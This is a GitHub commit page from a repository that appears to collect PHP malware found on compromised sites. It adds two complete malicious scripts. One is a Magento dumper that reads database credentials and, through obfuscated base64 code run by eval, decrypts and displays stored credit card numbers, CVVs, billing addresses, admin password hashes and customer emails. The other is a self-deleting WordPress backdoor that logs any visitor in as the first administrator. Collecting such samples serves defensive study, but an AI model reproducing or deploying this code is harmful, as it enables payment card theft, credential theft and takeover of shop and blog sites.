Skip to content

Commit bc23a36

Browse files
mattiasgeniarmattiasgeniar
committed
Merge branch 'master' of github.com:mattiasgeniar/php-exploit-scripts
* 'master' of github.com:mattiasgeniar/php-exploit-scripts: Found on magento Create backdoor_admin_access.php
2 parents 1ffe101 + 6dce175 commit bc23a36

File tree

2 files changed

+142
-0
lines changed

2 files changed

+142
-0
lines changed

found_on_magento/dump.php

Lines changed: 122 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,122 @@
1+
<?php
2+
3+
#===================================================================#
4+
# MAGENTO CMS AUTO DUMPER BY SYNCHRONIZER
5+
# RECODED BY rain | Res7ock crew #
6+
# WWW.PRINGSEWUDEV.ORG | WWW.PRINGSEWUCYBER.ORG #
7+
# http://facebook.com/annamLRW #
8+
#===================================================================#
9+
?>
10+
<style type="text/css">
11+
body {
12+
background:black;
13+
color: lime;
14+
}
15+
table {
16+
border-collapse: collapse;
17+
background-color: black
18+
}
19+
20+
th, td {
21+
text-align: center;
22+
padding: 6px;
23+
}
24+
table, th, td {
25+
border: 1px solid green;
26+
}
27+
tr:nth-child(even){background-color: black }
28+
29+
th {
30+
border: 1px solid green;
31+
background-color: #333;
32+
color: gold;
33+
}
34+
</style>
35+
<?php
36+
echo '<font color=lime>'.php_uname().'</font>';
37+
$adm = '
38+
mysql_select_db($connection->dbname);
39+
echo "HOST : <font color=gold>".$connection->host ."</font><font color=gold> | </font>USERNAME : <font color=gold>".$connection->username."</font><font color=gold> | </font>PASSWORD : <font color=gold>".$connection->password."</font><font color=gold> | </font>DB_NAME : <font color=gold>".$connection->dbname."</font></p>";
40+
$result = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM `".$prefix."admin_user` where is_active = 1");
41+
if($result !== FALSE) {
42+
while($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
43+
echo "<tr><td >".$row["user_id"]."</td>
44+
<td >".$row["username"]."</td>
45+
<td >".$row["password"]."</td>
46+
<td >".$row["email"]."</td>
47+
<td >".$row["firstname"]."</td>
48+
<td >".$row["lastname"]."</td></tr>";
49+
50+
}
51+
mysql_free_result($result);
52+
}
53+
';
54+
55+
$ccpay = 'ICRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUIGNvdW50KCopIEZST00gYCIuJHByZWZpeC4ic2FsZXNfZmxhdF9vcmRlcl9wYXltZW50YCB3aGVyZSANCg0KY2NfbnVtYmVyX2VuYyAhPScnIik7DQogICAgICAgaWYoJHJlc3VsdCAhPT0gRkFMU0UpIHsNCiAgICAgICAgICAgJGNvdW50ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCwgTVlTUUxfTlVNKTsNCiAgICAgICAgICAgbXlzcWxfZnJlZV9yZXN1bHQoJHJlc3VsdCk7DQogICAgICAgICAgIGlmKCRjb3VudCAmJiAkY291bnRbMF0pew0KICAgICAgICAgICAgICAgJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgDQoNCnNmby5jY19vd25lcixzZm8uY2NfbnVtYmVyX2VuYyxzZm8uY2Nfc2VjdXJlX3ZlcmlmeSxDT05DQVQoc2ZvLmNjX2V4cF9tb250aCwnfCcsc2ZvLmNjX2V4cF95ZWFyKSBhcyANCg0KZXhwLENPTkNBVChiaWxsaW5nLmZpcnN0bmFtZSwnfCcsYmlsbGluZy5sYXN0bmFtZSwnfCcsYmlsbGluZy5zdHJlZXQsJ3wnLGJpbGxpbmcuY2l0eSwnfCcsIA0KDQpiaWxsaW5nLnJlZ2lvbiwnfCcsYmlsbGluZy5wb3N0Y29kZSwnfCcsYmlsbGluZy5jb3VudHJ5X2lkLCd8JyxiaWxsaW5nLnRlbGVwaG9uZSwnfCcsYmlsbGluZy5lbWFpbCkgDQoNCkFTICdCaWxsaW5nIEFkZHJlc3MnIEZST00gIi4kcHJlZml4LiJzYWxlc19mbGF0X29yZGVyX3BheW1lbnQgQVMgc2ZvIEpPSU4gIi4NCg0KJHByZWZpeC4ic2FsZXNfZmxhdF9vcmRlcl9hZGRyZXNzIEFTIGJpbGxpbmcgT04gYmlsbGluZy5wYXJlbnRfaWQgPSBzZm8ucGFyZW50X2lkIEFORCANCg0KYmlsbGluZy5hZGRyZXNzX3R5cGUgPSAnYmlsbGluZycgd2hlcmUgY2NfbnVtYmVyX2VuYyAhPSAnJyIpOw0KICAgICAgICAgICAgICAgaWYoISRyZXN1bHQpIHsNCiAgICAgICAgICAgICAgICAgICBwcmludCgiPGI+RXJyb3Igc3FsOjwvYj4iLm15c3FsX2Vycm9yKCkuIjxici8+XG4iKTsgDQogICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICB3aGlsZSgkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCwgTVlTUUxfQVNTT0MpKSB7DQogICAgICAgICAgICAgICAgICBlY2hvICINCgkJCSAgIDx0cj48dGQgPiIuJHJvd1snY2Nfb3duZXInXS4iPC90ZD4NCgkJCSAgIDx0ZCA+Ii5NYWdlOjpoZWxwZXIoJ2NvcmUnKS0+ZGVjcnlwdCgkcm93WydjY19udW1iZXJfZW5jJ10pLiI8L3RkPg0KCQkJICAgPHRkID4iLiRyb3dbJ2V4cCddLiI8L3RkPg0KCQkJICAgPHRkID4iLiRyb3dbJ0JpbGxpbmcgQWRkcmVzcyddLiI8L3RkPg0KPHRkID4iLiRyb3dbJ2NjX3NlY3VyZV92ZXJpZnknXS4iPC90ZD48L3RyID4iOw0KICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgbXlzcWxfZnJlZV9yZXN1bHQoJHJlc3VsdCk7DQogICAgICAgICAgIH0NCiAgICAgICB9';
56+
$maildump = "ICRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUIGVtYWlsIEZST00gICIuJHByZWZpeC4iY3VzdG9tZXJfZW50aXR5Iik7DQogICAgICAgaWYoJHJlc3VsdCAhPT0gRkFMU0UpIHsNCiAgICAgICAgICAgd2hpbGUoJHJvdyA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXN1bHQsIE1ZU1FMX0FTU09DKSkgew0KICAgICAgICAgICAgICAgZWNobyAiDQoJCQkgICA8dHI+DQoJCQkgICA8dGQgPiIuJHJvd1siZW1haWwiXS4iPC90ZD48L3RyPg0KCQkJICAgIjsNCiAgICAgICAgICAgfQ0KICAgICAgICAgICBteXNxbF9mcmVlX3Jlc3VsdCgkcmVzdWx0KTsNCiAgICAgICB9";
57+
?>
58+
<?php
59+
60+
error_reporting(E_ALL);
61+
ini_set('display_errors', TRUE);
62+
ini_set('display_startup_errors', TRUE);
63+
64+
function print_data($data){
65+
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')) {
66+
$xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
67+
if(isset($xml->global->resources->default_setup->connection)) {
68+
$connection = $xml->global->resources->default_setup->connection;
69+
$prefix = $xml->global->resources->db->table_prefix;
70+
71+
require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
72+
73+
try {
74+
$app = Mage::app('default');
75+
Mage::getSingleton('core/session', array('name'=>'frontend'));
76+
}catch(Exception $e) {
77+
}
78+
79+
if (!mysql_connect($connection->host, $connection->username, $connection->password)){
80+
print("Could not connect: " . mysql_error());
81+
}
82+
eval($data);
83+
}
84+
}
85+
}
86+
?>
87+
88+
<center>
89+
<table style="text-align:center" width=90% class="tg">
90+
<tr>
91+
<th >ID</th>
92+
<th >USER_NAME</th>
93+
<th >PASSWORD</th>
94+
<th >EMAIL</th>
95+
<th >FIRST_NAME</th>
96+
<th >LAST_NAME</th>
97+
</tr>
98+
<?php
99+
echo print_data($adm);
100+
?>
101+
</table></p>
102+
<table style="text-align:center" width=90% class="tg">
103+
<tr>
104+
<th >CC_OWNER</th>
105+
<th >CC_NUMBER</th>
106+
<th >EXPIRED DATE</th>
107+
<th >BILLING ADDRESS</th>
108+
<th >cvv</th>
109+
</tr>
110+
<?php
111+
echo print_data(base64_decode($ccpay));
112+
?>
113+
</table>
114+
</p>
115+
<table style="text-align:center" width=90% class="tg">
116+
<tr>
117+
<th >E-MAIL ADDRESS</th>
118+
</tr>
119+
<?php
120+
echo print_data(base64_decode($maildump));
121+
?>
122+
</table>

found_on_wordpress/backdoor_admin_access.php

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
@unlink(__FILE__);
2+
3+
require('../../../wp-blog-header.php');
4+
require('../../../wp-includes/pluggable.php');
5+
$user_info = get_userdata(1);
6+
// Automatic login //
7+
$username = $user_info->user_login;
8+
$user = get_user_by('login', $username );
9+
// Redirect URL //
10+
if ( !is_wp_error( $user ) )
11+
{
12+
wp_clear_auth_cookie();
13+
wp_set_current_user ( $user->ID );
14+
wp_set_auth_cookie ( $user->ID );
15+
16+
$redirect_to = user_admin_url();
17+
wp_safe_redirect( $redirect_to );
18+
19+
exit();
20+
}

0 commit comments

Comments
 (0)